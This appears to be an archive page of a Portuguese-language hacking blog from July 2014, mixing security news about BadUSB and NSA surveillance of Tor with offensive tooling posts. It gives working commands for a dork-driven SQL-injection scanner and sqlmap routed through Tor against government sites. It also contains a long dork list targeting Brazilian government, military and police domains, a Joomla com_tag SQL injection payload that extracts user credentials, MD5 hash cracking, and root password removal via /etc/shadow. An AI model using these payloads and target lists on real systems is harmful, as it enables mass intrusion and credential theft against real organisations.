Black Hat 2014 desse ano promete viu ~
Dois pesquisadores de segurança estão prestes a divulgar uma descoberta sobre o USB que decreta o formato como um dos mais inseguros da atualidade.
Karsten Nohl e Jakob Lell construíram provas de conceito indicando que é possível contaminar uma unidade USB sem tocar na memória flash, focando apenas no firmware que controla suas funções.
Isso significa que nem a varredura mais completa encontraria o arquivo malicioso, e que qualquer coisa que use saída USB pode ser infectada - incluindo periféricos como teclado e mouse, além de pendrives.
Eles conseguiram colocar malwares nos chips usados para conectar um dispositivo ao computador e esses arquivos maliciosos são capazes de controlar funções e alterar pastas, além de direcionar o tráfego da internet a sites de interesse do atacante. Tudo sem serem notados.
O USB pode infectar o computador ou ser infectado por ele, e em nenhum dos casos o usuário comum tem chance de descobrir. Apenas um especialista com conhecimentos em engenharia reversa poderia encontrar o problema, mas só se estivesse procurando - e o firmware não costuma levantar suspeitas.
Os pesquisadores mostrarão como isso funciona durante a Black Hat, conferência anual sobre segurança que ocorre na semana que vem em Las Vegas, na intenção de estimular as pessoas a tomarem cuidado com o USB, porque este é um problema sem solução.
O que Nohl e Lell pretendem com a divulgação de suas descobertas é fazer um alerta para que as pessoas tratem dispositivos como pendrives da mesma forma que tratam seringas: cada um só pode usar o seu. É a única forma de garantir que não haverá complicações.
Nesta nova forma de pensar, você tem que considerar uma USB infectados e jogá-lo fora assim que ele toca em um computador não-confiável. "
Nohl e Lell, os investigadores para a consultoria de segurança SR Labs, estão longe de ser o primeiro a apontar que os dispositivos USB pode armazenar e espalhar malware. Mas os dois hackers não se limitou a copiar as suas próprias infecções com códigos personalizados para a memória de dispositivos USB '. Eles passaram meses engenharia reversa do firmware que executa as funções básicas de comunicação de dispositivos USB-os chips controladores que permitem que os dispositivos para se comunicar com um computador e permitir que os usuários mover arquivos dentro e fora deles. Sua descoberta central é que firmware USB, que existe em diferentes formas em todos os dispositivos USB, pode ser reprogramado para esconder código de ataque. "Você pode dar a seu povo em segurança de TI, eles digitalizá-lo, apagar alguns arquivos, e dá-lo de volta para você dizendo que é 'clean'", diz Nohl. Mas a menos que o cara de TI tem as habilidades de engenharia reversa para encontrar e analisar se o firmware, "o processo de limpeza nem sequer tocar os arquivos de que estamos falando."
http://www.wired.com/2014/07/usb-security/
quinta-feira, 31 de julho de 2014
terça-feira, 29 de julho de 2014
Vídeo Aula - Script InurlBr + SQLMAP + DecrypterMD5
Uma simples demonstração de funcionamento do SCANNER INURLBR junto com SQLMAP e DECRYPTERMD5.
Comandos utilizado:
php inurlbr.php --dork 'inurl:especialidades.php?id= site:gob.pe' --exploit-get '%27' -q 6 -s inurl_result.txt -p socks5://googleinurl@localhost:9050 --tor-random
Opções:
--dork = Define a dork que sera utilizada nos motores de busca
--exploit-get = Define o exploit via get, que será injetado em cada URL encontrada
-q = Define o motor de busca (ex.: google, bing, yahoo e etc...)
-s = Define o arquivo de saída, onde será armazenada as URLS encontradas
-p = Define o proxy para manter o anomimato
--tor-random = Habilita a função do tor randomico, a cada execução do script, o TOR muda de IP
Maiores detalhes:
https://github.com/googleinurl/SCANNER-INURLBR
Comando SQLMAP:
sqlmap --tor --tor-type=SOCKS5 -u http://sitevull.gob.pe/ --current-db --time-sec 10
Para utilizar o parametro "--tor" é necessário que esteja rodando localmente na porta 9050
Parrot e derivados: # service tor start
Verificar se está rodando: # netstat -an | grep 9050
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN
Comando utilizado DECRYPTERMD5:
php md5.php --md5 HASH --proxy socks5://googleinurl@localhost:9050
Opções:
--md5 = Informando o tipo do HASH
--proxy = Ativando o proxy para anomimato
Para maiores informações utilize: # php md5.php --help
segunda-feira, 28 de julho de 2014
INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK
Script feito em php que pesquisa dados públicos através de requests do próprio facebook.
Temos acesso ao seguinte resultado:
ID::
USERNAME::
NOME::
PRIMEIRO NOME::
SOBRENOME::
SEXO::
LOCAL::
FOTO LOGO PEQUENA::
FOTO LOGO GRANDE::
FOTO LOGO::
FOTO::
Exemplo de uso:
[+] Pesquisa dados facebook, Ex: php face.php zuck
[ RETORNO ]
Baixar:: http://pastebin.com/TdfymVXr
Temos acesso ao seguinte resultado:
ID::
USERNAME::
NOME::
PRIMEIRO NOME::
SOBRENOME::
SEXO::
LOCAL::
FOTO LOGO PEQUENA::
FOTO LOGO GRANDE::
FOTO LOGO::
FOTO::
Exemplo de uso:
[+] Pesquisa dados facebook, Ex: php face.php zuck
Baixar:: http://pastebin.com/TdfymVXr
Dorks variadas voltadas pra sqlinjection.
Busca erros sql sites .gov, falhas fbconnect_action e outras variantes de erros.
site:.websiteseguro.com inurl:produto.php?id= site:.com /ccbill/ "DOCUMENT_ROOT" ext:cgi inurl:game.php?id= inurl:mil inurl:"/?fbconnect_action=myhome" site:.gov.br "Microsoft OLE DB Provider" site:.esporte.gov.br ext:asp site:.esporte.gov.br (id|new|ver) site:.esporte.gov.br (id|new|ver) site:.psdb.org.br ext:asp id site:.websiteseguro.com inurl:produto.php?id= site:.globo.com ext:php mysql_ site:.gov.br .php?id= syntax; -pdf -policiacivil site:.gov.br SQL "syntax;" site:.ap.gov.br "SQL syntax;" ext:php site:.gov.br ext:sql -svn site:.nsa.gov PDF -public_info site:.mil.br "mil br" index.php?option= view site:.com inurl:tinybrowser ext:php intitle: TinyBrowser site:.gov.br (error) mysql (prefeitura) ext:php -pdf site:br index.php?option=com_user site:.gov.br .php?id= syntax; site:.gov.br ext:php (id*=|view=) site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection" site:rj.gov.br (php|asp|aspx) ? id site:.gov.br syntax; -pdf inurl:(|&id=|?id=|) site:br ext:asp (id*=|view=) 80040E14 site:.com.br ext:asp (id*=|view=) 80040E14 -superasp site:.anatel.gov.br ext:asp site:.gov.br (php|asp|aspx) ? id notic site:.mg.gov.br (php|asp) ?id= intitle:camara site:.gov.br ext:php (id*=|view=) intitle:camara site:.gov.br ext:php (id*=|view=) -projetodomhelder intitle:prefeitura site:.gov.br ext:php (id*=|view=) syntax; inurl:?fbconnect_action= myhome&fbuserid=* site:br inurl:view.php?id=* ext:php -Bug -moodle site:.com.br inurl:"ver_news.php?id=" site:.ceara.gov.br ext:asp site:.sp.gov.br inurl:.php? intext:"Warning" -policiacivil intext:"vBulletin" inurl:install/upgrade.php site:.ceara.gov.br ext:asp site:.ceara.gov.br ext:asp "*.asp?" "=*" inurl:.policiacivil.sp.gov.br modules inurl:.policiacivil.sp.gov.br modules ".php?" inurl:"/?fbconnect_action=myhome" "id=" & intext:"Warning: mysql_fetch_array() "id=" & intext:"Warning: getimagesize() "id=" & intext:"Warning: session_start() "id=" & intext:"Warning: mysql_num_rows() "id=" & intext:"Warning: mysql_query() "id=" & intext:"Warning: array_merge() "id=" & intext:"Warning: preg_match() "id=" & intext:"Warning: ilesize() "id=" & intext:"Warning: filesize() site:.ar inurl:fbconnect_action= fbuserid= intext:User site:.ar inurl:fbconnect_action= fbuserid= inurl:fbconnect_action= fbuserid= intext:User (uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) inurl:fbconnect_action= fbuserid= intext:User (uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php (id*=|view=) inurl:(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php inurl:pageid? inurl:.policiacivil.sp.gov.br modules site:sp.gov.br "Warning:" ext:php
quinta-feira, 24 de julho de 2014
Introdução SCANNER INURLBR V1.0
*Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a validação personalizada interna para cada alvo/url encontrada.
*Captura de emails.
*Execução de comandos direto no console para cada possível vulnerável. *Execução de comandos direto no console para todo alvo encontrado. *Analise de urls com base em arquivo txt, sem necessidade de usar motor de busca. *Definição de proxy. *Opção proxy TOR randômico.
_____ (_____) (() ()) \ / \ /
/=\
[___]
[INURLBR V1.0]
------------------------------------------------------------------------------
Explicando comando -q
Que é responsável por definir qual motor de busca vai efetuar os trabalhos.
-q tem acesso a 12 motores de busca.
1 - www.google.com.br
2 - www.bing.com
3 - br.search.yahoo.com
4 - www.ask.com
5 - search.hao123.com.br
6 - ajax.googleapis.com
7 - search.lycos.com
8 - busca.uol.com.br
9 - us.yhs4.search.yahoo.com
10 - pesquisa.sapo.pt
11 - www.dmoz.org
12 - www.gigablast.com
all - todos motores de busca
Default: 1
Exemplo: -q {op}
Uso:
-q 1
-q 5
Múltiplos motores -q 1,2,5,6,11
Todos motores -q all
Ex:
-----------------------------------------------------------------------------------------------------------------------------------
./inurlbr.php --dork 'site:br php?id=' -q 1,6 -s arquivo.txt --exploit-get "'´0x27"
-----------------------------------------------------------------------------------------------------------------------------------
0xVÍDEO[1]:
0xVÍDEO[2] - PARROT OS:
0xVÍDEO[2] - Usando Exploit joomla
0xDetalhes:
* joomla component com_tag (tag_id) SQL Injection Vulnerability
* [Joomla componente]
* com_tag (tag_id) Vulnerável a SQL-injection
0xCOMANDOS INURLBR:
./inurlbr.php --dork 'inurl:option=com_tag' -q 1,6 -s joomla.txt -t 3 --exploit-get '/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component' -a 'Edit Tags'
0xDOWNLOAD SCRIPT
https://github.com/googleinurl/SCANNER-INURLBR
Ref:
http://blog.inurl.com.br/2014/07/joomla-component-comtag-tagid-sql.html
segunda-feira, 21 de julho de 2014
Testando novo Scanner inurl beta
BETA - Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a captura de emails & validação personalizada interna para cada alvo/url encontrada.
#ZEND FRAMEWORK,#ERROS MYSQL,#ERROS MICROSOFT,#ERROS JDBC,#ERROS ORACLE,#ERROS POSTGRESQL,#ERROS PHP,#ERROS ASP,#ERROS LUA,#ERROS INDEFINIDOS_____ (_____) (() ()) \ / \ / /=\ [___]#####################################
#GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
#SCRIPT NAME: INURLBR
#AUTOR: Cleiton Pinheiro
#Nick: Googleinurl
#Blog: http://blog.inurl.com.br
#twitter: /@googleinurl
#facebook: /InurlBrasil
#Versão: 1.0
#-------------------------------------------------------------------------------
#PHP Version 5.4.7
#php5-curl LIB
#php5-cli LIB
#cURL support enabled
#cURL Information 7.24.0
#Apache 2.4
#allow_url_fopen On
#permission Reading & Writing
#User root privilege, or is in the sudoers group
#Operating system LINUX
#Proxy random TOR
#####################################
[YOUTUBE]
https://www.youtube.com/watch?v=_zpYVreCR_w
sexta-feira, 18 de julho de 2014
DecrypterMD5 API
[ INURLBR API DecrypterMD5 ]
bdbbe98d4714585c4a2eae76cd0e3cae
xNeither war between hackers, nor peace for the system.
----------------------------------------------------------------------------------
[+] Pesquisa por arquivo, Ex: php md5.php --file filemd5.txt[+] Pesquisa simples, Ex: php md5.php --md5 21232f297a57a5a743894a0e4a801fc3
_____ (_____) (() ()) \ / \ / /=\ [___]
----------------------------------------------------------------------------------
- Exemplo: --proxy {proxy:porta}
- Uso: --proxy localhost:8118
--proxy socks5://googleinurl@localhost:9050
--proxy http://admin:[email protected]:8080
O uso da rede TOR no script garante que você não seja bloqueado em requisições massivas.
Baixar:: http://pastebin.com/grYTVJKF
terça-feira, 15 de julho de 2014
ALGORITHM filme sobre hacking
<the_hacker_movie>
No centro da trama de ALGORITHM são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.
Primeiro Trailer
http://www.thehackermovie.com/
QUEBRAR SENHA DO ROOT com live CD
QUEBRAR SENHA DO ROOT
Acessando seu disco rígido com live CD.
Monta a partição, por exemplo: $mount /dev/sda2/ /mnt
Caso não tenha a pasta mnt crie ela: mkdir /mnt
Acessa a partição/sistema com o chroot: $chroot /mnt /bin/bash
Agora todo comando que for efetuado no terminal vai ser executado na maquina real,
Ou seja trocar a senha root do seu usuário
Ex:
$passwd usuário
$passwd root
Existe outra forma
Depois de montar a partição e executar o comando chroot
sudo gedit /etc/shadow
Primeira linha algo assim
root:AQUI_TEM_SENHA:16100:0:99999:7:::
Ex: root:$6$DsDwdas$4xFds.EfzTJl3I:16100:0:99999:7:::
Apague a senha
Vai ficar algo assim:
root::16100:0:99999:7:::
Feche o arquivo e salvando o mesmo, logo depois reinicia a maquina sem o cdlive.
E troque a senha do root, o mesmo serve para outros usuários.
$passwd root
quinta-feira, 3 de julho de 2014
joomla component com_tag (tag_id) SQL Injection Vulnerability
[Joomla componente]
[X] com_tag (tag_id) Vulnerável a SQL-injection
0xDORK[0]: inurl:option=com_tag
0xExploit[0]: /index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
Exemplo:
http://WWW.URL.COM/index.php?option=com_tag
&controller=tag&task=add&article_id=1
/index.php?option=com_tag&controller=tag&task=add&article_id=-ID{vull}
Injetando:
http://
WWW.URL.COM
/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
RESPOSTA:
REF:http://www.exploit-id.com/web-applications/joomla-component-com_tag-tag_id-sql-injection-vulnerability
ALGUNS RESULTADOS:
Usando scanner INURLBR:
REPOSITÓRIO::: http://pastebin.com/Tb0Qp0qY
XKeyscore exposto: NSA define todos os utilizadores da rede Tor alemães como "extremistas".
A NSA foi revelado para marcar e considerar potenciais "extremistas" todos os usuários do serviço de internet anonymizer Tor. Entre aqueles que são centenas de milhares de pessoas preocupadas privacidade como jornalistas, advogados e ativistas de direitos.
Procurando software de criptografia, como o sistema operacional baseado em Linux Tails também coloca você no grid NSA, como Lena Kampf, Jacob Appelbaum e John Goetz revelado no site alemão Tagesschau. O relatório é baseado na análise do código-fonte do software usado por um programa de vigilância eletrônica XKeyscore da NSA.
Tor é um sistema de servidores, que encaminha as solicitações de usuários por meio de uma camada de conexões seguras para torná-lo impossível identificar IP de um usuário a partir dos endereços dos sites que ele / ela visita. A rede de cerca de 5.000 é operado por entusiastas e usado por centenas de milhares de pessoas de privacidade-preocupado todo o mundo. Alguns deles vivem em países com regimes opressivos, que punem os cidadãos para visitar sites que considerem inapropriado.
Mas o site apenas visitar projeto Tor coloca você na lista vermelha da NSA, diz o relatório. Mas o mais importante é que ele monitora as conexões com os chamados Autoridades Directory, os oito servidores, que atuam como gateways para todo o sistema.
A NSA foi particularmente vigiar alemão baseado Autoridades Diretório Tor. Uma é operado pelo grupo de hackers com sede na Alemanha Chaos Computer Club, o outro pelo estudante de ciência da computação Sebastian Hahn, que disse aos jornalistas que a revelação é "chocante".
O sistema em si não parece ser comprometida no entanto, mas a NSA recebe dados como endereços IP de quem o utiliza, o suficiente para cross-referenciá-los com outras bases de dados da agência tem acesso.
Rede anonymizer Tor entre as metas da NSA, vazamentos Snowden revelar
Há indícios de que a NSA pode ser de coleta não só os metadados das pessoas na lista, mas também ler as suas trocas de e-mail com Tor.
Um interesse em Tor não é a única maneira de fazê-lo a lista de vigilância da NSA. Até mesmo buscas na web para outro software de criptografia faz de você um alvo, bem como, segundo o relatório.
Perturbadoramente, comenta programador NSA na etiqueta de código fonte desses pego pelo sistema americano "extremistas".
O relatório diz que XKeyscore marca todas as pessoas que atingiram a luz vermelha em sua grade, com excepção dos conectando de membros dos cinco olhos, um grupo de países a cooperar na recolha de informações, ou seja, os EUA, Reino Unido, Canadá, Austrália e Nova Zelândia .
Fonte: http://rt.com/news/170208-nsa-spies-tor-users/
Assinar:
Postagens (Atom)